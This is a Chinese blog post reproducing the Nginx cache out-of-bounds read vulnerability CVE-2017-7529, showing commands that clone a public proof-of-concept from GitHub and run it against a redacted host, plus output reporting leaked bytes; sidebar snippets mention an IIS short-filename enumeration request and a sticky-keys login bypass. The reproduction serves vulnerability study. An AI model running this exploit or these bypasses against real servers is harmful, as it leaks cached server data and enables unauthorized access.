Nginx读取缓存-CVE-2017-7529

最新推荐文章于 2022-02-19 03:07:06 发布
最新推荐文章于 2022-02-19 03:07:06 发布
阅读量256 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44664530/article/details/106215805
版权

影响范围:
Nginx 0.5.6 - 1.13.2
复现:
在这里插入图片描述

//下载poc
C:\Users\17273\Downloads\wordpress46-learn-master>git clone https://github.com/en0f/CVE-2017-7529_PoC
Cloning into 'CVE-2017-7529_PoC'...
remote: Enumerating objects: 6, done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 6
Unpacking objects: 100% (6/6), done.
C:\Users\17273\Downloads\wordpress46-learn-master>cd CVE-2017-7529_PoC
//利用
C:\Users\17273\Downloads\wordpress46-learn-master\CVE-2017-7529_PoC>python CVE-2017-7529_PoC.py http://xxx.xxx.xxx:xxxx/
[+] xxx.xxx.xxx:xxxx is Vulnerable: TRUE
[i] Receiving Data [2805 bytes] ...
 -  0000: 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30 30  --00000000000000

在这里插入图片描述
参考文献:
https://blog.csdn.net/qq_29647709/article/details/85076309

曈曚
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将...
CVE-2017-7529Nginx越界读取缓存漏洞POC
weixin_45694388的博客
07-28 685
漏洞影响 低危,造成信息泄露,暴露真实ip等 实验内容 漏洞原理 通过查看patch确定问题是由于对http header中range域处理不当造成,焦点在ngx_http_range_parse 函数中的循环: HTTP头部range域的内容大约为Range: bytes=4096-8192bytes=-字符串指针p中即为“bytes=”后面的内容 这段代码是要把“-”两边的数字取出分别赋值给 start 和 end 变量标记读取文件的偏移和结束位置。 对于一般的页面文件这两个值怎么玩都没关系。但对于有
Docker搭建Nginx整数溢出漏洞(CVE-2017-7529)及Python PoC验证
mister 代
01-31 707
Poc复现 一 Docker搭建Nginx整数溢出漏洞(CVE-2017-7529)及Python PoC验证 参照文档: https://www.77169.net/html/158360.html https://blog.csdn.net/SKI_12/article/details/76944203?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-8.control&de
vulhub nginx CVE-2017-7529
weixin_37639863的博客
02-19 228
漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园Nginx敏感信息泄露漏洞(CVE-2017-7529)https://www.cnblogs.com/cute-puli/p/13282355.html poc #!/usr/bin/env python import sys import requests if len(sys.argv) < 2: print("%s url" % (sys.argv[0])) print("eg: py...
Nginx越界读取缓存漏洞(CVE-2017-7529)
haha1314的博客
07-15 1291
Nginx越界读取缓存漏洞(CVE-2017-7529) 漏洞原理 参考阅读: https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7 http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/ Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件...
ingress-nginx-controller-1.9.yaml
10-18
对于 "nginx-tomcat-svc-ingress.yaml" 和 "nginx-tomcat-deploy.yaml",同样使用 `kubectl apply` 命令进行部署,以启动 Tomcat 应用并设置其 Ingress 规则。 验证配置是否生效的方法有很多,例如,你可以使用 `...
lua-nginx-module-0.10.13
07-18
《深入理解Lua-Nginx-Module 0.10.13》 Lua-Nginx-Module,简称lua-nginx-module,是Nginx服务器的一个重要扩展模块,它将强大的Lua脚本语言集成到Nginx中,允许用户在Nginx配置文件中直接编写Lua代码,极大地增强...
windows下编译nginx-http-flv-moudle
11-18
在Windows环境下编译`nginx-http-flv-module`是一项技术性的任务,主要目的是为了实现HTTP FLV协议的直播功能,使得用户可以通过浏览器中的FLVJS库或者无插件Flash播放器来观看直播内容。这个模块是Nginx的一个扩展...
win环境使用nginxnginx-http-flv-module.zip
08-24
在windows 7 64位 环境下使用nginxnginx-http-flv-module搭建flv视频流播放所有的安装包,参考:https://blog.csdn.net/qq_33071429/article/details/102628008
Nginx越界读取缓存漏洞分析CVE-2017-7529
qq_43571759的博客
04-22 684
CVE-2017-7529 Nginx越界读取缓存漏洞 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 漏洞分析 如果我的请求中包含Range头,Nginx将会根据我指定的sta...
Microsoft IIS波浪号目录枚举/IIS短文件名枚举漏洞
weixin_44664530的博客
06-11 8123
Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。 复现: /images//*~1*/a.aspx?aspxerrorpath=/ 危害: 攻击者可以利用“~”字符猜解或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝服务攻击。 解决方案:修改注册列表HKLM\SYSTEM\CurrentControlSet\Control\FileSystem \NtfsDisable8dot3NameCreation的值为1,或者,
cve-2020-11652漏洞复现
weixin_44664530的博客
05-08 1489
介绍: Saltstack是基于python开发的一套C/S架构自动化运维工具,通过Saltstack运维人员可以实现在众多服务器上批量执行命令,提高运维效率,因而受到一些云主机商、私有云公司的青睐。然而,近日SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。其中,通过认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master...
win证书漏洞CVE-2020-0601
weixin_44664530的博客
05-23 852
影响版本: Windows 10 Windows Server 2016/2019 依赖于Windows CryptoAPI的应用程序 复现: 查看一下本地windows证书,win+r输入certmgr.msc 这里可以看到系统默认的ECC签名根证书,随便找一个导出: 双击证书可以看到证书的详细信息: 安装ruby a@a-virtual-machine:~$ sudo apt install ruby //若提示进程被占用解决方法 //ps -A | grep apt 列出使用的进程 //
幽灵猫漏洞复现
weixin_44664530的博客
05-14 714
漏洞编号: CVE-2020-1938 CNVD-2020-10487 影响版本: Apache Tomcat = 6 7 <= Apache Tomcat < 7.0.100 8 <= Apache Tomcat < 8.5.51 9 <= Apache Tomcat < 9.0.31 解决措施: 配置ajp配置中的secretRequired跟secret属性来限制认证 ; 临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connec
6379 Redis 未授权访问
weixin_44664530的博客
05-14 601
漏洞产生原因 网络管理员安装Redis,没有修改默认端口,没有设置密码。 环境搭建 //下载压缩包 wget http://download.redis.io/releases/redis-3.2.11.tar.gz //解压 tar xzf redis-3.2.11.tar.gz //进入解压目录 cd redis-3.2.11 make //进入src目录 cd src //拷贝redis-server到/usr/bin cp redis-serrver /usr/bin //拷贝redis-cli到
win未登录连按shift以管理员身份开启cmd漏洞
weixin_44664530的博客
05-11 591
复现 可用于自己电脑忘记密码使用 强制关闭win7虚拟机后启动,点击启动启动修复: 自动修复一段时间会弹出如下界面,点击取消让他继续修复: 经过长时间修复后会出现无法修复的窗口,此时点击问题纤细信息: 上面的问题签名不用管,直接拉到最下面会看到一个隐私声明,点击他: 这时会出现一个txt文档,点击 文件->打开 : 这时点击计算机进入系统盘 打开windows ->system32文件夹,寻找连按五次触发的sethc文件: 将他重命名,任意起一个名字,这里的目的是为了下次不会再触发他:
win MS08-067漏洞复现
weixin_44664530的博客
05-12 557
影响范围: Windows 2000 Windows XP Windows Server 2003 复现环境 win xp :192.168.31.178 kali :192.168.31.117
基于NginxNginx-rtmp -module
最新发布
05-22
Nginx-rtmp-module是一个第三方模块,可以将Nginx扩展为支持RTMP协议的流媒体服务器,提供了RTMP直播、点播和HLS协议的支持,可以满足大多数流媒体应用的需求。使用Nginx-rtmp-module可以快速搭建一个强大的流媒体...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值